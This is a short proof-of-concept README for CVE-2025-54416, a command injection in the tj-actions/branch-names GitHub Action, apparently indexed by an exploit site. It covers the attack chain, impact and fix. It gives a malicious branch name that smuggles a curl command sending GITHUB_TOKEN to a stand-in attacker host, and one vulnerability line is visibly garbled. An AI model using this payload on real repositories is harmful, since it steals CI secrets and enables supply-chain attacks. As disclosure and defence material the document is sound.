## https://sploitus.com/exploit?id=3CB20A2E-E6AB-54A4-9973-33CBD21AC9EB
# CVE-2025-54416: tj-actions/branch-names Command Injection PoC
This repository demonstrates **CVE-2025-54416**, a critical command injection vulnerability in `tj-actions/branch-names` affecting over 5,000 public repositories.
## Vulnerability
The `tj-actions/branch-names` GitHub Action (versions > "$GITHUB_OUTPUT"
```
## Attack Chain
1. Attacker creates a branch with a malicious name containing shell commands
2. Victim's workflow uses `tj-actions/branch-names@v8.2.1` to extract the branch name
3. The extracted branch name (with attacker payload) is used in subsequent shell commands
4. **Command executes in the CI runner context with runner's privileges**
5. Secrets (AWS keys, GITHUB_TOKEN, etc.) are exfiltrated
## Example Payload
Branch name: `main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)`
When the workflow runs:
```bash
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN
```
## Impact
- Theft of sensitive secrets (AWS keys, API tokens, GITHUB_TOKEN)
- Unauthorized code modifications
- Malicious image pushes to production registries
- Supply chain attacks via compromised CI/CD
## Fix
Update to `tj-actions/branch-names@v9` or later, which replaces `eval printf "%s"` with safe `printf` calls.
## References
- [GitHub Advisory GHSA-gq52-6phf-x2r6](https://github.com/advisories/GHSA-gq52-6phf-x2r6)
- [CVE-2025-54416](https://nvd.nist.gov/vuln/detail/CVE-2025-54416)